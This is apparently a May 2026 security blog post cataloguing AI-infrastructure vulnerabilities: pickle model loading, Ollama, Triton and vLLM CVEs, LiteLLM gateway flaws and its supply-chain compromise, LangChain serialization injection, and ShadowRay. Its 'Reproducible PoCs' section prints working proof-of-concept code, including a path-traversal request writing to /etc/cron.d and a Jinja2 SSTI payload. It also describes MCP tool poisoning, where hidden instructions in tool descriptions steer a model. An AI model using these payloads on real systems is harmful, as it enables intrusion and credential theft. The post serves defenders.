AI infrastructure: two years of incidents that confirm the category

Two years ago, “AI security” meant prompt injection, jailbreaks and model evaluations. The surface was the model — what it says and how to make it say something else. By May 2026, the operational conversation has shifted: the dominant problem is no longer in the model, it sits in everything built around it to serve it. Inference servers with curl evil.com | parse in the endpoint. AI gateways with the OpenAI API key in the proxy and SSRF in the api_base parameter. ML frameworks that load pickle by default and treat weights_only=True as mitigation. As-a-service platforms with cross-tenant pickle. Orchestration libraries with serialization injection. And the closing of the arc: compromising security products (Trivy, Checkmarx) to infiltrate the AI gateways that depend on them.

This post is the synthesis piece. It collects the 12+ public milestones from 2024–2026 we’ll be referencing for the rest of the year when someone asks “why is AI infrastructure a category of its own?“.

Lab notes: the Probllama, NVIDIA Triton chain and LangGrinch PoCs are reproducible in a Linux VM. So is malicious pickle against torch.load(weights_only=True) — the patch arrived in PyTorch 2.6.0, anything earlier is exploitable.

The backbone: pickle as a broken legacy format

PyTorch picked pickle as its default serialisation format a decade ago. The decision was deliberate: pickle is Python-native, supports any object, and removes the need for a custom parser. The operational consequence is that any .pt or .bin file is an executable binary dressed up as a data file. Pickle runs native code at the moment of load, before any human validation.

The year this consequence becomes public:

February 2024 — JFrog finds ~100 silently backdoored models on Hugging Face Hub. Clones of legitimate models (bert-base-uncased, gpt2 variants) with an attached pickle payload that opens reverse shells or calls out to attacker C2. Hugging Face had no active scanner before disclosure.
April 2024 — Wiz Research publishes the first public cross-tenant case in AI-as-a-Service. They upload a PyTorch model with a malicious __reduce__ to HF’s shared inference and execute code inside the container serving other customers. They read cross-tenant models and tokens. The same platform suffers a CI/CD takeover via Spaces.
December 2024 — JFrog publishes 22 vulnerabilities in MLflow, H2O, PyTorch and MLeap. Half are variations of the same pattern: the framework’s model format runs native code when loaded.
April 2025 — CVE-2025-32434 (CVSS 9.3) breaks the canonical mitigation. torch.load(weights_only=True) — the flag the documentation recommended as “safe loading” — is bypassable with a crafted file. PyTorch 2.5.1 and earlier are vulnerable. The ecosystem’s defensive posture is invalidated by a single CVE.

The defensive move of the year: safetensors. Hugging Face pushes the format (metadata + tensors only, no executable code), picklescan integrates automatically on upload, and most enterprise model registries reject pickle by default from Q3 2025. The problem still drags on:

# This is still the default loading pattern in thousands of pipelines:
import torch
model = torch.load("./model.pt")  # executes any attached pickle

The PyTorch 2.6.0 patch makes weights_only=True actually safe against the known bypass. The structural problem remains the ecosystem contract: a model format that runs code at load(). Any tool that loads models from uncontrolled sources has to go through picklescan or force safetensors. It’s still opt-in.

Inference servers — HTTP attack surface with a complex multimodal footprint

Two years ago, “inference server” meant an endpoint that took text and returned text. In May 2026, it means an HTTP binary parsing video, image, audio, embeddings, model files, tool descriptions, and multimedia artifacts — each with its own chain of native codecs (FFmpeg, OpenCV, Pillow, libwebp, libpng). The surface is that of an enterprise media server with the maturity of a research project.

The three milestones that define the category:

May 2024 — Ollama Probllama (CVE-2024-37032). Wiz Research publishes a path traversal in the /api/pull endpoint that downloads models from a registry. The digest parameter controls the path where Ollama writes the downloaded file, with no validation. An attacker with API access makes Ollama overwrite system binaries or configs the service reads at boot. Persistent RCE on the next restart. Wiz counts more than 1,000 Ollama instances exposed to the internet at the time of disclosure. Coverage in the May 2024 bulletin.
August 2025 — NVIDIA Triton chain (CVE-2025-23319 + CVE-2025-23320 + CVE-2025-23334). Wiz publishes a chain of three CVEs against the Python backend of Triton Inference Server. Step 1: information leak — the attacker gets the unique name of an internal shared memory region by sending a crafted request. Step 2: with that name, read/write to the region. Step 3: with read/write, corrupt internal structures and trigger code execution. Patch in Triton 25.07. Tens of thousands of exposed instances according to Shodan. Coverage in the August 2025 bulletin.
February 2026 — vLLM CVE-2026-22778 (CVSS 9.8). Orca Security publishes a pre-auth RCE in vLLM via a crafted video URL sent to the multimodal endpoint. The chain lives inside OpenCV’s JPEG2000 decoder (which vLLM uses through its FFmpeg dependency): first a PIL-exception info leak reveals a heap address of the BytesIO (reducing ASLR from 4·10⁹ to ~8 attempts), then a chained heap overflow gives flow control. Patch in vLLM 0.14.1. Coverage in the February 2026 bulletin.

On top of those three, add CVE-2025-62164 (vLLM, deserialisation in the Completions API), CVE-2026-22807 (vLLM, code injection at model load via auto_map with no gating on trust_remote_code), and CVE-2024-50050 (Meta llama-stack, copy-pasted pickle replicated in NVIDIA TensorRT-LLM as CVE-2025-23254).

The structural pattern is clear:

inference server = HTTP server with:
 - complex state (multi-model, multi-tenant)
 - inherited native parsers (FFmpeg, OpenCV, Pillow)
 - no auth by default
 - deployed as "trusted internal network" that ends up on the internet

What used to be “serve a model” is today serving a binary that pulls in six native codecs. The threat model inherited from the vllm[image,video] or ollama[full] chain isn’t reflected in the operator’s security posture. Reverse proxy with auth, network segmentation and GPU load monitoring are the three compensating controls that stop these three CVEs in production.

AI gateways — the credentialed proxy as the new crown jewel

LiteLLM is the case study. An AI gateway fans out LLM calls to multiple providers (OpenAI, Anthropic, Azure, AWS Bedrock, local Ollama), consolidates billing, applies rate limiting, and centralises credentials. The company runs the proxy, puts the provider API keys there, and devs call the proxy with lighter internal credentials. The provider key lives in the proxy, not in the dev — that’s the product’s value proposition.

In 2024, LiteLLM piles up six public CVEs, all tied to the credentialed-proxy pattern:

CVE-2024-2952 — Jinja SSTI in /completions via an unsanitised chat_template.
CVE-2024-5225 — SQL injection in /global/spend/logs via direct concatenation of api_key.
CVE-2024-5710 — improper access control in team management.
CVE-2024-5751 — RCE in /config/update via add_deployment decoding base64 into os.environ.
CVE-2024-6587 — SSRF in api_base: the attacker sets the parameter to their server, receives the forwarded request with the proxy’s API key in the Authorization header, and walks off with the OpenAI / Anthropic / Azure key. Coverage in the July 2024 bulletin.
CVE-2024-9606 — API key masking that only masks the first 5 characters in logs.

Each CVE is a classic API gateway pattern (SSRF, SQLi, SSTI) in an AI product that inherits the full surface of a traditional proxy. The reason is that it is one: AI gateway = API gateway + prompt bus. The difference is the software maturity.

The LiteLLM arc closes in March 2026 with TeamPCP supply chain. The group first compromises the Trivy security scanner (19 March), rewriting Git tags in aquasecurity/trivy-action with a credential-harvester payload. Five days later they use the PyPI credentials of the LiteLLM maintainer — captured via the prior Trivy compromise — to publish litellm==1.82.7 and litellm==1.82.8 with a three-stage payload. The tools a dev installs to defend themselves become the vector. The AI gateway stops being just a credentialed proxy: it’s a pivot point into the infra hosting it. Coverage in the March 2026 bulletin.

Minimum defensive action for AI gateways in production:

Provider credential audit trail (which dev / which tenant requested which key, when).
Rate limiting per destination (not just by provider, by host).
api_base allowlist to block SSRF.
Version pinning + package hash verification.
Network isolation of the proxy: if the AI gateway runs in a namespace with cloud privileges (bucket access, KMS, secrets manager), a proxy compromise becomes a cloud account compromise.

ML frameworks with research-project security

MCP tool poisoning (March 2025) opened the editorial category. The malicious MCP server hides instructions in a tool’s description; the client passes them to the model as prompt; the model obeys. What looked like a spec problem in November 2024 (when we analysed MCP at the protocol level) became an operational category with OWASP MCP Top 10 v0.1 a year later.

The same pattern shows up in LangChain in December 2025. LangGrinch — CVE-2025-68664 (CVSS 9.3). The dumps() and dumpd() functions don’t escape dictionaries with the 'lc' key when serialising free-form metadata. The 'lc' key is LangChain’s internal marker for its serialised objects; when an attacker manages to place a structure with 'lc' inside user-controlled data (additional_kwargs, response_metadata of an LLM response), re-serialising the conversation makes the round-trip load arbitrary objects from the pre-approved namespaces langchain_core / langchain / langchain_community. With secrets_from_env=True (default), it exfiltrates environment variables. With Jinja2 enabled, RCE.

LangChain.js suffers the equivalent bug as CVE-2025-68665 (CVSS 8.6). Coverage in the December 2025 bulletin.

# Vulnerable pattern: conversation round-trip with LLM-controlled fields
from langchain_core.load import dumps, loads

# Attacker injects via prompt injection a message whose response_metadata has:
malicious = {
    "lc": 1, "type": "constructor",
    "id": ["langchain", "schema", "..."],
    "kwargs": {"secrets_from_env": True, ...}
}

serialized = dumps(message)   # doesn't escape 'lc' in metadata
restored = loads(serialized)  # executes the payload constructor

The root bug: the system assumes the contents of additional_kwargs and response_metadata are flat. In reality, in a system with LLMs and prompt injection, any field controllable by the model’s output is attacker-controlled. The attack surface includes the whole conversation, not just the last prompt.

The SDK’s save / load / dumps / loads functions are attack surface when the content comes from a model. The pattern repeats:

Framework	Function	CVE	Year
PyTorch	`torch.load()`	CVE-2025-32434	2025
PyTorch Lightning	`torch.load()` without `weights_only`	CVE-2024-5452	2024
LangChain	`dumps()` / `loads()`	CVE-2025-68664	2025
LangChain.js	same	CVE-2025-68665	2025
vLLM	`torch.load()` in Completions	CVE-2025-62164	2025
MLflow	recipe loader	(several JFrog 2024)	2024

The SDK’s safety classifier is an afterthought. The operational question: which step of your pipeline calls save/load with content whose origin includes an LLM?

Deliberate design without defences — the Ray case

Anyscale Ray is the extreme example. CVE-2023-48022 (CVSS 9.8) — missing authentication in the Ray Job Submission API (/api/jobs/) — isn’t a bug. It’s deliberate design: Ray runs on a trusted network, says Anyscale, so the admin API doesn’t need auth. The argument is technically valid. The problem is operational: the user’s deploy by default doesn’t account for that segmentation.

March 2024 — ShadowRay 1.0 (Oligo Security). Active campaign since September 2023. Thousands of Ray clusters exposed to the internet with public dashboards. Attackers submit malicious jobs via API, run arbitrary code with the process’s privileges, install XMRig to mine Monero on corporate GPUs, and exfiltrate cloud credentials. ByteDance, Amazon, governments among the confirmed victims. Coverage in the March 2024 bulletin.
November 2025 — ShadowRay 2.0 (same bug, different scale). 230,000 Ray servers exposed to the internet (vs a few thousand in 2024). The botnet is now self-spreading: each compromised cluster scans the public Ray dashboard space and replicates the payload. The load includes XMRig + sockstress (DDoS via TCP state exhaustion), probably aimed at rival pools. The payloads carry AI-generated code signatures (unnecessary verbose docstrings, unused echo lines, repetitive comments, boilerplate error handling). Operators with little coding background scaling with a model. Coverage in the November 2025 bulletin.

Anyscale holds the position in May 2026: “Ray must run on an isolated network”. Technically correct. Operationally irrelevant. The by design argument fails when market behaviour differs from what the vendor assumes.

The same pattern applies to:

Ollama — localhost only by default, except the real behaviour includes ollama serve on a VPS with port forwarding.
MLflow tracking servers — internal network, but they expose LFI, XSS and artifact serving on any corporate network with distributed development.
Hugging Face Spaces — sandboxed builders, until a pickle payload runs on the shared host.
MCP servers — user-installed only, until the public catalog fills with third-party servers carrying tool poisoning.

The editorial read is the same for all five: the threat model declared by the framework vendor is a technical decision the operator silently inherits. If the decision assumes network isolation and the operator doesn’t provide it, operational responsibility is ambiguous and the CVEs don’t get assigned to the framework — they end up in the “abused, not exploited” limbo.

Reproducible PoCs

Three sandbox PoCs that show the categories without touching anything in production.

Probllama (CVE-2024-37032) in Docker

Docker image with Ollama 0.1.33 (pre-patch):

docker run -d -p 11434:11434 --name ollama-vuln ollama/ollama:0.1.33

# The attacker sends the crafted pull:
curl -X POST http://localhost:11434/api/pull \
  -H "Content-Type: application/json" \
  -d '{
    "name": "evil.example.com/../../../../etc/cron.d/backdoor"
  }'

# Ollama writes the model manifest to /etc/cron.d/backdoor
# On the next container restart, cron runs whatever is in the manifest

Ollama 0.1.34+ validates the name format and rejects path traversal. Capturing the vulnerable behaviour confirms the category: an endpoint built to download models ends up as a write-anywhere primitive.

NVIDIA Triton chain (CVE-2025-23319/20/34) — exploit skeleton

Wiz doesn’t publish a full exploit, but the chain is documented. Lab setup: Triton 24.06 without the patch + Python backend enabled. Step 1 is sending a request to the inference endpoint that triggers an error parsing the Python model — the error message includes the unique name of the shared memory region Triton created for that request. Capturing that name gives access to the region (step 2), where the attacker writes control structures that steer the flow of step 3 into an attacker-controlled callback. The result is RCE in the Triton process.

The skeleton that reproduces the pattern without putting the full RCE together:

import requests

# Step 1: info leak
r = requests.post(
    "http://target:8000/v2/repository/models/vuln-model/load",
    json={"parameters": {"config": "..."}}  # crafted to force an error
)
# The error message contains something like:
# "Cannot find shared memory region 'triton_shm_abc123_xyz789'"

shm_name = extract_shm_name(r.text)  # "triton_shm_abc123_xyz789"

# Step 2: read the leaked region (via the API exposed with that name)
# The Python backend allows access to shared memory by name without auth
shm_data = requests.get(
    f"http://target:8000/v2/systemsharedmemory/region/{shm_name}/status"
)
# From here, controlled writes to the region trigger
# corruption of internal structures → control flow

Patch in Triton 25.07. The chain needs no sophisticated exploit primitive — it needs the combination of three logic bugs in different endpoints that assume trust in the caller.

LangGrinch (CVE-2025-68664) in a LangChain harness

Reproducible locally with langchain-core <= 0.3.21:

from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

# Attacker injects via prompt injection an AIMessage whose response_metadata
# contains a structure LangChain interprets as a serialised object:
malicious_message = AIMessage(
    content="ok",
    response_metadata={
        "lc": 1,
        "type": "constructor",
        "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
        "kwargs": {
            "template": "{{ ''.__class__.__mro__[1].__subclasses__()[...]() }}",
            "template_format": "jinja2"
        }
    }
)

# The operator serialises the conversation to persist it:
serialized = dumps(malicious_message)

# On loading back, LangChain instantiates the PromptTemplate with Jinja2:
restored = loads(serialized)
# Jinja2 with access to the __subclasses__ chain runs arbitrary code

Fix in langchain-core >= 0.3.22: allowed_objects allowlist, Jinja2 disabled by default, secrets_from_env=False. Real defence also means reviewing which pipelines round-trip LLM messages (cache, streaming, persist-to-DB) — any dumps/loads over an LLM message is a point to audit.

Operational read for CISOs

What’s worth taking into the corporate threat model as of May 2026:

Inventory AI infrastructure as a separate category. It isn’t “more Python software”. It’s HTTP servers with multimodal surface, proxies holding third-party credentials, as-a-service platforms with cross-tenant execution, and model registries with executable code in load(). If your CMDB doesn’t distinguish “inference server” from “API gateway”, the blast radius is underestimated.
Pickle as a present threat, not a historical one. Any torch.load, pickle.load or equivalent over a file the operator doesn’t control is pending RCE. weights_only=True is no longer universal mitigation after CVE-2025-32434. Safetensors is the structural answer; pinning PyTorch ≥ 2.6.0 is the minimum.
AI gateway = crown jewel. Your LiteLLM / Portkey / Helicone / OpenRouter on-prem holds API keys worth money (OpenAI/Anthropic quotas) and sometimes data (logs of internal prompts). Treat it the way you’d treat a PAM: network isolation, cloud account segregation, installed-package monitoring via hash, version allowlists, alerting on new upstream releases.
Inference servers behind auth. Ollama, vLLM, Triton, TGI, llama.cpp — none of the popular inference servers have native authentication, or they ship with it disabled by default. Reverse proxy with auth + network segmentation is the minimum. If the service is internet-facing, assume pending compromise.
Python package and model supply chain. The TeamPCP compromise of LiteLLM / Trivy / Checkmarx shows that security products are valid targets. For AI infra specifically, strict pinning + hash verification + monitoring upstream changes are a requirement, not best practice.
“Secure by design if isolated” as an operational flag. Ray, local MCP servers, Ollama on localhost — frameworks that delegate security to network isolation are entirely the operator’s responsibility. The vendor isn’t going to patch what they consider expected behaviour.
save/load pipelines as surface. Any process that serialises/deserialises messages that passed through an LLM is now a vector for prompt injection upgraded to RCE. langchain-core, llama-index, haystack and dspy have equivalent functions — audit internal usage.

The frontier labs respond in April 2026

Anthropic publishes on 7 April 2026 Project Glasswing and the Mythos model — the first commercial gated frontier model with a mandatory harness. Glasswing is a direct answer to the pattern this post just catalogued: if the risk of a model in production isn’t in what it says but in what it executes when it has tool access, the defensive answer has to live in the harness, not in the model. The Glasswing architecture applies safety classifiers on every tool call, a third-party-verifiable cryptographic audit trail, rate limits differentiated by category of action (query vs write vs execute), and a remote kill-switch via signed messages.

Two weeks later, OpenAI publishes GPT-5.5-Cyber (23 April 2026) — a GPT-5.5 variant trained specifically for blue team tasks (SIEM triage, KQL queries, SIGMA generation), embedded in Microsoft Security Copilot Agents. And Anthropic ships Claude Opus 4.7 (16 April 2026) as a frontier model with extended thinking and native Glasswing support.

What these three moves close for this post: the defensive side of the AI infrastructure quadrant stops being just patch + safetensors + version pinning and starts having specific commercial product. The timeline matches the one the offensive side closed a year earlier with XBOW reaching #1 on HackerOne. The full quadrant is covered in the agentic red team piece.

The gap between disciplines: the AI team spent 24 months iterating on prompts, evals, agent harnesses and RAG. The security team had spent decades iterating on HTTP servers, deserialisation, supply chain and identity. The two teams didn’t sit down together in earnest until 2024–2025. The chain of incidents we just walked through is the documentation of that blind spot — and Glasswing is the first coordinated industrial response.

References

Pickle / model format

JFrog, Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor (Feb 2024): https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/
Wiz Research, Hugging Face works with Wiz to strengthen AI cloud security (Apr 2024): https://www.wiz.io/blog/wiz-and-hugging-face-address-risks-to-ai-infrastructure
JFrog, Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks (Dec 2024): https://thehackernews.com/2024/12/researchers-uncover-flaws-in-popular.html
PyTorch advisory CVE-2025-32434: https://github.com/advisories/GHSA-53q9-r3pm-6pq6

Inference servers

Wiz Research, Probllama: Ollama RCE Vulnerability (CVE-2024-37032): https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
Wiz Research, Breaking NVIDIA Triton: CVE-2025-23319 chain: https://www.wiz.io/blog/nvidia-triton-cve-2025-23319-vuln-chain-to-ai-server
Orca Security, Critical RCE in vLLM (CVE-2026-22778): https://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/

AI gateways

GitHub Advisory CVE-2024-6587 (LiteLLM SSRF): https://github.com/advisories/GHSA-g26j-5385-hhw3
Trend Micro, Your AI Gateway Was a Backdoor: Inside the LiteLLM Supply Chain Compromise (Mar 2026): https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html
Datadog Security Labs, LiteLLM and Telnyx compromised on PyPI: Tracing the TeamPCP supply chain campaign: https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/
Unit 42, Weaponizing the Protectors: TeamPCP’s Multi-Stage Supply Chain Attack: https://unit42.paloaltonetworks.com/teampcp-supply-chain-attacks/
Snyk, How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM: https://snyk.io/blog/poisoned-security-scanner-backdooring-litellm/

ML frameworks / SDK

GitHub Advisory CVE-2025-68664 (LangGrinch): https://github.com/advisories/GHSA-c67j-w6g6-q2cm
Cyata, All I Want for Christmas is Your Secrets: LangGrinch hits LangChain Core: https://cyata.ai/blog/langgrinch-langchain-core-cve-2025-68664/
Invariant Labs, MCP Tool Poisoning Attacks (Mar 2025): https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks

”By design”

Oligo Security, ShadowRay (Mar 2024): https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
The Hacker News, ShadowRay 2.0 (Nov 2025): https://thehackernews.com/2025/11/shadowray-20-exploits-unpatched-ray.html

February 2024 bulletin — JFrog HF malicious models
March 2024 bulletin — ShadowRay 1.0
April 2024 bulletin — Wiz × HF cross-tenant
May 2024 bulletin — Ollama Probllama
July 2024 bulletin — LiteLLM CVE-2024-6587
December 2024 bulletin — JFrog 22 ML framework issues
MCP tool poisoning (Mar 2025)
April 2025 bulletin — PyTorch CVE-2025-32434
August 2025 bulletin — NVIDIA Triton chain
November 2025 bulletin — ShadowRay 2.0
December 2025 bulletin — LangGrinch
State of MCP at 16 months (Mar 2026)
February 2026 bulletin — vLLM CVE-2026-22778
March 2026 bulletin — LiteLLM supply chain TeamPCP

AI infrastructure: two years of incidents that confirm the category

The backbone: pickle as a broken legacy format

Inference servers — HTTP attack surface with a complex multimodal footprint

AI gateways — the credentialed proxy as the new crown jewel

ML frameworks with research-project security

Deliberate design without defences — the Ray case

Reproducible PoCs

Probllama (CVE-2024-37032) in Docker

NVIDIA Triton chain (CVE-2025-23319/20/34) — exploit skeleton

LangGrinch (CVE-2025-68664) in a LangChain harness

Operational read for CISOs

The frontier labs respond in April 2026

References

Pickle / model format

Inference servers

AI gateways

ML frameworks / SDK

”By design”

Related Posts

MCP at 16 months: 15+ incidents, two spec revisions and an MCPwn exploited in the wild

AI Security 2024 — annual dossier

Sleeper agents: when the attack lives inside the model

The backbone: pickle as a broken legacy format

Inference servers — HTTP attack surface with a complex multimodal footprint

AI gateways — the credentialed proxy as the new crown jewel

ML frameworks with research-project security

Deliberate design without defences — the Ray case

Reproducible PoCs

Probllama (CVE-2024-37032) in Docker

NVIDIA Triton chain (CVE-2025-23319/20/34) — exploit skeleton

LangGrinch (CVE-2025-68664) in a LangChain harness

Operational read for CISOs

The frontier labs respond in April 2026

References

Pickle / model format

Inference servers

AI gateways

ML frameworks / SDK

”By design”

Related posts in the arc

Related Posts

MCP at 16 months: 15+ incidents, two spec revisions and an MCPwn exploited in the wild

AI Security 2024 — annual dossier

Sleeper agents: when the attack lives inside the model